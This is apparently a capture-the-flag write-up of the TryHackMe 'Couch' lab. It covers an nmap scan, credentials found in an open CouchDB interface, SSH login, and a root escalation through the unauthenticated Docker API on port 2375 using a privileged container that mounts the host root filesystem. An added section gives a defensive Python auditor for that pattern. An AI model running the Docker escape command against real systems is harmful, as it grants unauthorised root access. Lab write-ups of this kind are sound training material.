We always start with an Nmap scan.
nmap -sC -p1-6000 -sV -oA nmap <Target-IP>
┌──(muzec㉿Muzec-Security)-[~/Documents/TryHackMe/couch]
└─$ nmap -sC -p1-6000 -sV -oA nmap 10.10.128.130
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-01 03:45 EDT
Stats: 0:04:58 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 42.33% done; ETC: 03:56 (0:06:46 remaining)
Stats: 0:11:15 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 80.25% done; ETC: 03:59 (0:02:46 remaining)
Nmap scan report for 10.10.128.130
Host is up (0.21s latency).
Not shown: 5998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 34:9d:39:09:34:30:4b:3d:a7:1e:df:eb:a3:b0:e5:aa (RSA)
|   256 a4:2e:ef:3a:84:5d:21:1b:b9:d4:26:13:a5:2d:df:19 (ECDSA)
|_  256 e1:6d:4d:fd:c8:00:8e:86:c2:13:2d:c7:ad:85:13:9c (ED25519)
5984/tcp open  http    CouchDB httpd 1.6.1 (Erlang OTP/18)
|_http-server-header: CouchDB/1.6.1 (Erlang OTP/18)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 904.98 seconds
Now it's time to answer the task questions; they're easy.
Scan the machine, how many ports are open?
Our Nmap scan shows only 2 open ports, so that is the answer.
What is the database management system installed on the server?
The Nmap result also shows the database, which is the answer.
What port is the database management system running on?
We can see that from the Nmap result as well.
What is the version of the management system installed on the server?
What is the path for the web administration tool for this database management system?
What is the path to list all databases in the web browser of the database management system?
What are the credentials found in the web administration tool?
Now the fun begins. Let's navigate to
http://10.10.128.130:5984/_utils/. Yes, it's such a nice interface, I know.
We all love secrets, lol, so I'm checking the secret database first.
Now the key, let's open it.
Boom, we have the credentials.
Compromise the machine and locate user.txt
Now let's use the credentials to log in over SSH.
We have user.txt. Nice, right? Time to get root.
Escalate privileges and obtain root.txt
Checking listening ports, I saw 127.0.0.1:2375. I did some research on port 2375 and found out that Docker's remote API is running on it. Nice. Is it possible to escape from it? Let's give it a try.
The Remote API runs by default on port 2375 when enabled. By default the service does not require authentication, allowing an attacker to start a privileged Docker container. Using the Remote API, one can attach the host's / (root directory) to the container and read/write files in the host's environment.
Default port: 2375
Now for our payload:
docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/root alpine
Let's try running it on the target.
We are root. Nice, and we have our root flag.
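As an added defender-side example (not part of the original write-up), the following Python audits a host for the pattern just used: a Docker API listener on port 2375 in `ss -lnt` style output, and container records (in the shape of the Engine API's GET /containers/{id}/json) that are privileged, on the host network, or bind-mount the host's /. It goes slightly beyond the page by also flagging a few other sensitive host paths; the listener lines and container records are constructed samples, not data from the target.

```python
import re

# Host paths whose bind mount into a container hands over the host. "/" is the
# write-up's case; the other entries are common equivalents (my assumption).
SENSITIVE_HOST_PATHS = {"/", "/etc", "/root", "/var/run/docker.sock"}

def risky_findings(container):
    """Reasons a container record (GET /containers/{id}/json shape) matches the
    privileged + host-network + host-mount escape pattern; [] means clean."""
    host = container.get("HostConfig") or {}
    reasons = []
    if host.get("Privileged"):
        reasons.append("privileged")
    if host.get("NetworkMode") == "host":
        reasons.append("host network")
    for bind in host.get("Binds") or []:        # "host_path:container_path[:opts]"
        src = bind.split(":", 1)[0]
        if src in SENSITIVE_HOST_PATHS:
            reasons.append(f"mounts host {src}")
    return reasons

def exposed_docker_ports(listener_lines):
    """(address, port) for TCP listeners on 2375 (plain HTTP) or 2376 (TLS) in
    `ss -lnt` / `netstat -lnt` style output. A 2375 listener is the one to fix."""
    found = []
    for line in listener_lines:
        m = re.search(r"\s(\S+):(2375|2376)\s", line)
        if m and "LISTEN" in line:
            found.append((m.group(1), int(m.group(2))))
    return found

# Constructed samples (not captured from the target machine).
SAMPLE_CONTAINERS = [
    {"Name": "/web", "HostConfig": {"Privileged": False, "NetworkMode": "bridge",
                                    "Binds": ["/srv/site:/usr/share/nginx/html:ro"]}},
    {"Name": "/alpine-escape", "HostConfig": {"Privileged": True, "NetworkMode": "host",
                                              "Binds": ["/:/root"]}},
]
SAMPLE_LISTENERS = [
    "LISTEN 0      128          0.0.0.0:22        0.0.0.0:*",
    "LISTEN 0      128        127.0.0.1:2375      0.0.0.0:*",
    "LISTEN 0      128          0.0.0.0:5984      0.0.0.0:*",
]

def audit(containers=SAMPLE_CONTAINERS, listener_lines=SAMPLE_LISTENERS):
    """One report dict: exposed API listeners plus flagged containers."""
    flagged = {c["Name"]: risky_findings(c) for c in containers if risky_findings(c)}
    return {"exposed_api": exposed_docker_ports(listener_lines), "containers": flagged}
```

On a real host, feed `audit()` the output of `ss -lnt` and the JSON from `docker inspect` of each running container; any non-empty result is a finding to remediate (bind the daemon to a Unix socket or require TLS client certificates, and drop the privileged/host-mount containers).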
Probably Unintended Way To Obtain Root.
After finishing the box, I tried to dig deeper into the kernel version.
Yes, it's all running an old version, so let's try the OverlayFS Local Privilege Escalation (CVE-2021-3493), which I already have here on my blog: OverlayFS - Local Privilege Escalation - CVE-2021-3493 (POC)
We are root, and done.
Greetings From Muzec